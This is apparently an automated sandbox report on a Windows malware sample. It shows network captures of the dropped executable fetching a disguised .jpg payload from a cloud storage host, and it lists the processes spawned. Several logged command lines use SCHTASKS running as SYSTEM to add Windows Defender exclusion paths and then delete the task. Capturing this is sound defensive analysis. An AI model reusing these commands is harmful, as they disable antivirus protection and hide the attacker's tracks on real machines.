2025-01-12 03:11:58 UTC	4096	IN	Data Raw: ef cc 4c d0 d3 09 06 21 8c 0a e4 fd 58 ee 29 db 81 82 6d c1 a4 30 bc c1 88 36 cd ab 62 b5 32 ab fb fb ec 20 e3 1f be d1 52 c7 7b bf 58 54 f3 43 f2 8d 0e 8b f7 13 10 a0 bb 4f ee a1 7a 27 8f 37 90 b6 93 e7 12 94 df b3 75 98 ed 5e 3f 26 b3 6b dc e4 4b ac 06 65 59 29 76 21 46 e6 59 50 ec 8d 23 41 76 61 bd b4 2a c0 a1 d0 00 7d 85 b9 46 a9 73 14 b0 38 5b 50 8e c5 4d 41 4e b1 33 ec 52 c8 9b 60 d6 75 f5 94 ee 23 f4 6f f6 e6 d2 e9 4d 56 be d7 e4 8f 26 6e aa 79 e5 e6 5e 13 6c 17 b6 e2 e2 11 f5 fe 7e 0b 44 9b c6 aa 3a f9 70 8c 7b bc 07 41 a6 db 37 9c 40 ed 30 d4 63 08 f2 34 c3 bc 19 00 1b 0e a0 05 0a d9 18 ea e0 fd 6c 8a 5d c5 2d 44 59 87 c8 6a f8 9f 94 42 5d b7 0d 78 f1 3b 58 f0 58 03 2c 94 05 87 6d 14 59 c3 c8 52 68 6d 20 54 3c df df dd d3 b3 5e da 3a d6 ef ef f3 Data Ascii: L!X)m06b2 R{XTCOz'7u^?&kKeY)v!FYP#Ava*}Fs8[PMAN3R`u#oMV&ny^l~D:p{A7@0c4l]-DYjB]x;XX,mYRhm T<^:
2025-01-12 03:11:58 UTC	4096	IN	Data Raw: 15 03 58 89 56 b4 b6 a2 ad 03 9c f1 67 d1 75 f3 e8 19 38 39 86 89 50 71 f6 9c 55 6e f0 3c 79 b6 4b a6 36 b9 b4 a2 ab 24 ae 39 77 96 dd 86 d0 fd 7d 97 cb 0d f0 c5 e3 02 f9 c1 52 24 d9 92 d5 0f ce ba 02 8d 60 9d a4 7e 46 0c f6 07 7e 6e 99 9f b7 49 61 ff 7c c2 1d c4 45 e2 10 ab 9d 5d f3 48 c7 32 f2 49 bd 7e 2c f3 14 b8 55 84 3b b6 cd f2 2c a2 4e c8 2f 6a 5f 90 af 64 33 93 34 22 de 67 0c 00 0a 07 58 6d 1d 91 a5 e8 77 57 3e 92 ad 64 db 25 db 5a a7 9e fb ee 37 1e bf 9f 1c 20 8f 58 83 8e 9c 9d 1a 84 f4 2f e8 b6 e9 fc 5c 14 cf 3d a8 20 c1 36 73 8b 6d ad fa 19 32 a5 19 e7 34 c8 51 2a b2 c7 6f 71 16 6b 1a c9 12 87 4a 5b 13 27 7e 0c 5d 42 3e 1f df 6d a6 94 82 5a 53 5e fd 07 49 a4 e3 fa f2 49 de ae 8b 50 62 d9 cf c2 ba 82 06 00 8f 34 6e 19 e8 d9 e4 90 5c e0 85 6f a3 Data Ascii: XVgu89PqUn<yK6$9w}R$`~F~nIa\|E]H2I~,U;,N/j_d34"gXmwW>d%Z7 X/\= 6sm24Q*oqkJ['~]B>mZS^IIPb4n\o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	50017	118.178.60.9	443	7108	C:\Users\user\Documents\cajXRH.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-12 03:12:08 UTC	115	OUT	GET /FOM-53.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-12 03:12:09 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sun, 12 Jan 2025 03:12:09 GMT Content-Type: image/jpeg Content-Length: 366410 Connection: close x-oss-request-id: 67833309DF72713034E49A27 Accept-Ranges: bytes ETag: "DA1D5EB665D3AAD523BE59415E6449ED" Last-Modified: Tue, 22 Oct 2024 14:47:51 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 5641369857548672686 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 2h1etmXTqtUjvllBXmRJ7Q== x-oss-server-time: 27
2025-01-12 03:12:09 UTC	3549	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-12 03:12:09 UTC	4096	IN	Data Raw: 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 Data Ascii: ```````````````````````````````````````````````````````````````
2025-01-12 03:12:09 UTC	4096	IN	Data Raw: 60 60 60 eb 25 68 30 9f 75 d0 14 62 70 e9 25 84 e3 1d 84 60 15 67 52 a0 89 a9 60 60 60 06 67 e5 4c a2 a0 c6 2b ed ac f1 5f b5 0c d4 a2 b0 c6 29 e5 4e 2b f5 44 2b e2 ac 2b a8 2b b1 29 f5 10 8a f0 6d a5 0c b0 6b ad 34 6b b1 a8 b2 1f f5 2c 94 e2 f0 63 18 1f 95 e7 d2 20 09 68 e0 e0 e0 67 e5 5c a1 a0 a0 a0 ca a4 2d e5 5c f0 ca a8 c8 5f 5f a0 a0 2b ed 74 2b f1 e8 f2 5f b5 08 d4 a2 70 e5 a0 15 59 a7 25 b8 61 60 60 60 a7 25 bc 40 df 62 60 a7 25 80 e8 73 60 60 0a 60 0a 60 ed 25 48 f0 ca a0 ca a0 ca ac 2d ed 78 f1 c8 a4 a0 a0 38 2b f5 74 2b e2 e8 f0 5f b5 00 d4 a2 b0 2b ed 34 26 a1 b3 e1 8a e0 8a e0 8a e0 6b b5 34 b2 88 69 f7 e0 f0 8a e0 8a e0 08 da 10 e0 e0 63 24 fc 2b ed 74 29 e1 e4 10 a1 2b 45 fd 62 a8 a0 f5 2b 4c 18 b8 6a a0 a0 48 9a a7 a1 a0 f6 f7 2b e5 a8 e9 Data Ascii: ```%h0ubp%`gR```gL+_)N+D+++)mk4k,c hg\-\__+t+_pY%a```%@b`%s````%H-x8+t+_+4&k4ic$+t)+Eb+LjH+
2025-01-12 03:12:10 UTC	4096	IN	Data Raw: 2c 9d 9f 9f 31 ed f5 f4 9e 9f 9f 32 88 1d 9d 60 60 e3 a4 70 ed e5 f4 9e 9f 9f 30 ed ed 10 5d 5f 5f f1 5f b5 30 d2 a2 b0 ca a0 c8 20 a0 a0 a0 ca a2 ca a0 ca a2 c8 a0 a0 a0 e0 c8 a0 4c a2 f0 1f f5 74 92 e2 f0 69 65 84 1d 1f 1f 63 5d 84 1d 1f 1f 1f 95 e7 d3 20 09 0a e0 e0 e0 8a e0 6d 35 cc 5d 5f 5f f2 2b e5 a8 f0 48 06 5c a0 a0 23 64 a4 2b ed ac 8b 68 23 49 a1 f1 2b f5 a8 f2 48 f1 9c 60 60 e3 a4 64 eb 2d 68 ed 34 61 61 32 eb e5 04 9d 9f 9f 30 9f 75 f8 12 62 70 eb ed 04 9d 5f 5f f1 5f b5 44 d2 a2 b0 c8 54 a1 a0 a0 5f b5 6c d2 a2 b0 ca a1 c8 8c 4c a2 b0 48 61 5c 5f 5f 63 24 e8 8a e0 88 b8 0c e2 f0 08 dd 1b e0 e0 63 24 e8 63 18 1f 94 d0 8a e0 8a e0 8a e0 6d 75 18 5e 5f 5f f2 c8 24 4c a2 b0 ca a0 5f b5 a0 d3 a2 b0 ca a0 01 68 ec a5 b0 f0 5f b5 3c d2 a2 b0 ca 60 Data Ascii: ,12``p0]___0 Ltiec] m5]__+H\#d+h#I+H``d-h4aa20ubp___DT_lLHa\__c$c$cmu^__$L_h_<`
2025-01-12 03:12:10 UTC	4096	IN	Data Raw: 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 44 45 46 47 48 49 4e 4e 4e 4a 4b 4e 8e 8e 8c 8d f5 2b 4c 21 4c 18 a2 a0 a0 29 2d e8 5d 5f 5f c8 ac 4e a2 b0 48 3e a3 a0 a0 23 64 a4 8a e0 88 f4 0e e2 f0 08 d5 0d 1f 1f 63 24 e8 8a e0 88 d0 0e e2 f0 08 c6 0d 1f 1f 63 24 e8 88 08 a3 a0 a0 5f b5 6c d2 a2 b0 c8 e8 4e a2 b0 5f b5 20 d2 a2 b0 c8 c0 4e a2 b0 5f b5 20 d2 a2 b0 c8 88 63 60 60 9f 75 ac 12 62 70 08 64 61 60 60 ed e5 98 9e 9f 9f 30 0a 60 9f 75 e4 12 62 70 a6 e5 24 5e 5f 5f eb 66 25 25 5e 5f 5f e5 66 25 26 5e 5f 5f f2 66 25 27 5e 5f 5f ee 66 25 28 5e 5f 5f a5 26 65 69 1e 1f 1f ac 26 65 6a 1e 1f 1f d3 26 65 6b 1e 1f 1f d2 26 65 6c 1e 1f 1f ce 26 65 6d 5e 5f 5f c4 66 25 2e 5e 5f 5f cc 66 25 2f 5e 5f 5f cc 66 25 30 5e 5f 5f a0 66 25 d4 5e 5f 5f e7 a6 Data Ascii: NNNNNNNNNNNNNNNNNNDEFGHINNNJKN+L!L)-]__NH>#dc$c$_lN_ N_ c``ubpda``0`ubp$^__f%%^__f%&^__f%'^__f%(^__&ei&ej&ek&el&em^__f%.^__f%/^__f%0^__f%^__
2025-01-12 03:12:10 UTC	4096	IN	Data Raw: 75 90 12 62 70 d8 61 60 60 60 8b 62 8b 80 eb 85 3d a3 35 eb 8c e3 8c 08 37 eb 25 68 e9 25 38 66 e5 3c a0 19 b8 a0 a0 a0 93 60 2d dd 3d 53 0b c6 0b 0a ca c4 2b ed 38 f1 2d f5 3c f2 48 92 2f e0 e0 63 24 ec 6d a5 7c b0 6b ed 28 09 e2 f0 b1 88 78 a5 e5 f0 6b b5 78 63 22 84 b2 08 df 1f 5f 5f 23 64 b0 93 60 ff 2b 45 fd 62 a4 a0 f5 2b 4c ca a0 01 68 49 a2 b0 f0 c8 38 e5 a5 b0 2b ed 68 31 88 7a 9f 9f 9f e3 a4 70 53 a0 3d a2 64 60 35 eb 8c 0a 60 c1 60 60 60 70 30 08 60 60 60 70 2b ed a8 f1 48 58 5e 5f 5f 23 64 b0 93 60 fd 62 a4 a0 f5 2b 4c 21 4c 80 a4 a0 a0 f7 c8 cc 4f a2 f0 1f f5 68 92 e2 f0 69 a5 18 d3 20 86 41 6a dd e5 f0 65 20 95 e5 09 a7 e1 e0 e0 d3 29 86 6b ed 2a 9d a5 b0 29 ed 5c 2b f5 5c 61 42 aa 29 f5 50 ca a0 c8 20 a0 a0 a0 ca a4 ca a0 ca a2 c8 a0 a0 60 Data Ascii: ubpa```b=57%h%8f<`-=S+8-<H/c$m\|k(xkxc"__#d`+Eb+LhI8+h1zpS=d`5````p0```p+HX^__#d`b+L!LOhi Aje )k*)\+\aB)P `
2025-01-12 03:12:10 UTC	4096	IN	Data Raw: 61 60 60 eb 25 68 30 ed ed 40 9d 9f 9f 31 88 00 df 60 60 e3 a4 6c a6 e5 f8 9e 9f 9f 60 d9 f9 a0 a0 a0 93 60 2d 1d 39 5e 5f 5f 53 0b c6 0b 0a ca a0 ca a0 ca a2 ca a0 ca a1 c8 a0 a0 a0 e0 6d 75 cc 1e 1f 1f b2 1f f5 74 92 e2 f0 69 65 70 1e 1f 1f 63 5d 70 1e 1f 1f 1f 95 e7 d3 20 09 11 a0 a0 a0 ca a0 2d 25 34 5e 5f 5f f0 2b ed ac 21 49 d0 a1 a0 a0 f1 2b f5 a8 21 62 d0 a1 a0 a0 f2 eb e5 f0 9e 9f 9f 30 9f 75 f8 12 62 70 e5 a0 15 67 53 a0 89 dc 60 60 60 eb ed f0 9e 9f 9f 31 9f b5 a4 ed a5 b0 2d 35 88 5d 5f 5f f2 48 c4 6c a0 a0 23 64 a4 25 60 d4 85 2d 25 88 5d 5f 5f f0 2d 6d cc 1e 1f 1f b1 88 6c 11 e2 f0 6d 75 78 1e 1f 1f b2 1f f5 b4 ad e5 f0 63 24 f0 0b f4 6d 65 cc 5e 5f 5f f0 2d 2d 38 5e 5f 5f f1 5f b5 68 d2 a2 b0 2b 35 84 5d 5f 5f 29 35 bc 5d 5f 5f 23 1d bc 9d Data Ascii: a``%h0@1``l``-9^__Smutiepc]p -%4^__+!I+!b0ubpgS```1-5]__Hl#d%`-%]__-mlmuxc$me^__--8^___h+5]__)5]__#
2025-01-12 03:12:10 UTC	4096	IN	Data Raw: 60 ac ac 35 eb 8c 53 a0 c0 4c c6 65 70 e3 80 61 e5 a0 15 6f ea 6d 4c c6 65 70 e0 a9 61 e8 ad 8c 06 a5 b0 fd 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 ac 2a e8 6b b5 1c 68 ea 8a e0 6b ad 1c 08 f5 e2 e0 e0 6b a5 e8 b0 6b ad 1c 08 a9 e1 e0 e0 6b a5 1c 6b 45 fd 62 a8 a0 f5 2b 4c f1 29 ed 5c ca a1 2b ed 5c 48 4f a1 a0 a0 2b 45 fd 63 6c 6c 6c 6c 6c 6c ac ac ac ac ac 35 eb 8c 31 e9 2d 9c ea 25 68 30 0a 61 eb 2d 9c 88 eb 60 60 60 eb 85 3d a2 64 60 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 5c 2b e8 a8 9b ed a8 d7 a5 48 c2 c9 a1 a0 2b ed 5c 48 f1 e1 e0 e0 6b b5 1c 6b a2 e4 e3 a5 e8 6b 05 bd 22 e4 e0 2c 2c b5 6b 0c 63 0c e8 69 ad 1c 6b a5 5c 23 d8 a4 a0 d5 aa 48 c9 a1 a0 a0 29 e5 58 4b a9 2b ed 5c 2b f1 a4 29 f5 58 2b e5 58 2b 45 fd a3 Data Ascii: `5SLepaomLepacllllllllllllll+L)\+*khkkkkkEb+L)\+\HO+Ecllllll51-%h0a-```=d`lllll+L)\+\+H+\Hkkk",,kcik\#H)XK+\+)X+X+E
2025-01-12 03:12:10 UTC	4096	IN	Data Raw: 62 e3 98 1d 15 6a a7 65 0c 94 62 70 60 60 60 60 e3 5d 0c 94 62 70 60 14 41 08 12 74 60 60 5f b5 6c d2 a2 b0 2b 2d 44 5e 5f 5f 48 7c 5c 5f 5f 2b 2d 44 5e 5f 5f 48 ff 5d 5f 5f 2b ed 54 c4 69 ed e0 e0 e0 e0 bf be bb 6b 05 bd 22 e8 e0 2c 2c 2c 2c 2c 2c b5 6b 0c b1 69 ad 1c 6b ad 1c 08 23 5c 5f 5f 2b e5 a8 23 40 a1 25 60 d4 ac 2b ed 5c f1 48 53 3e a0 a0 23 64 a4 2b e5 5c 2b 45 fd a2 64 60 ac ac 35 eb 8c 88 67 60 60 60 88 71 60 60 60 3d a3 35 eb 8c d9 ad 2c 65 70 88 75 3c 61 a0 fd 63 f5 2b 4c c8 f0 d7 a0 b0 48 10 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6d ec a5 b0 48 d3 fd e1 e0 bd 23 b5 6b 0c 08 e7 e0 e0 e0 08 f1 e0 e0 e0 bd 23 b5 6b 0c 59 2c ac e5 f0 08 30 89 e1 e0 fd 63 f5 2b 4c c8 2f d7 a0 b0 48 d1 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6c ec a5 b0 48 90 cb a1 60 Data Ascii: bjebp````]bp`At``_l+-D^__H\|\__+-D^__H]__+Tik",,,,,,kik#\__+#@%`+\HS>#d+\+Ed`5g```q```=5,epu<ac+LH#dc+LmH#k#kY,0c+L/H#dc+LlH`
2025-01-12 03:12:10 UTC	4096	IN	Data Raw: eb 25 d0 30 9f 75 4c 10 62 70 eb 2d f8 e9 2d e4 eb 35 d0 32 9f 75 84 12 62 70 eb 25 cc 30 5f b5 44 d2 a2 b0 2b ed 24 29 ed 18 4b a7 67 e5 18 a0 a0 a0 a0 23 dd 14 a0 d4 aa 2b f5 14 f2 5f f5 ec 92 e2 f0 6b a5 58 6b 05 bd 23 b5 6b 0c 61 0c 7c e5 e0 e0 88 df 68 e0 f0 88 50 3d e4 f0 1f b5 80 d0 a2 b0 03 54 ed a5 b0 67 a5 58 ed a5 b0 80 a0 a0 a0 67 a5 a0 ee a5 b0 a7 a0 a0 a0 67 a5 64 2e 65 70 60 60 60 60 a7 65 70 2e 65 70 b0 67 60 60 a7 65 6c 2e 65 70 61 60 60 60 a7 65 9c 2d a5 b0 a2 a0 a0 a0 c8 58 ed a5 b0 01 54 ed a5 b0 f0 5f b5 c4 d0 a2 b0 67 a5 ac ee a5 b0 a0 a0 a0 e0 88 14 e1 e0 e0 1f f5 2c 92 e2 f0 27 65 8c 1f 1f 1f 74 e0 e0 e0 6d 6d 8c 1f 1f 1f b1 1f f5 f8 d2 a2 b0 23 1d d0 5f 5f 5f a6 d3 96 67 a5 5c ed a5 b0 a4 a0 a0 a0 c8 58 ed a5 b0 2b b5 54 ed a5 70 Data Ascii: %0uLbp--52ubp%0_D+$)Kg#+_kXk#ka\|hP=TgXggd.ep````ep.epg``el.epa```e-XT_g,'etmm#___g\X+Tp

Target ID:	0
Start time:	22:10:21
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\1387457-38765948.15.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\1387457-38765948.15.exe"
Imagebase:	0x140000000
File size:	30'954'656 bytes
MD5 hash:	947CD5DF10D540B879C037C1CB519E63
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	22:11:21
Start date:	11/01/2025
Path:	C:\Users\user\Documents\cajXRH.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\cajXRH.exe
Imagebase:	0x140000000
File size:	133'136 bytes
MD5 hash:	D3709B25AFD8AC9B63CBD4E1E1D962B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	22:11:23
Start date:	11/01/2025
Path:	C:\Users\user\Documents\cajXRH.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\cajXRH.exe
Imagebase:	0x140000000
File size:	133'136 bytes
MD5 hash:	D3709B25AFD8AC9B63CBD4E1E1D962B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	22:11:33
Start date:	11/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff6d9f50000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	22:11:33
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	22:11:33
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	22:11:33
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	22:11:33
Start date:	11/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6d9f50000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	22:11:33
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	22:11:33
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	22:11:33
Start date:	11/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff693320000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	22:11:34
Start date:	11/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff6d9f50000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	22:11:34
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	22:11:34
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	22:11:34
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	22:11:34
Start date:	11/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6d9f50000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	22:11:34
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	22:11:34
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	22:11:35
Start date:	11/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff693320000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	22:11:35
Start date:	11/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff6d9f50000
File size:	289'792 bytes
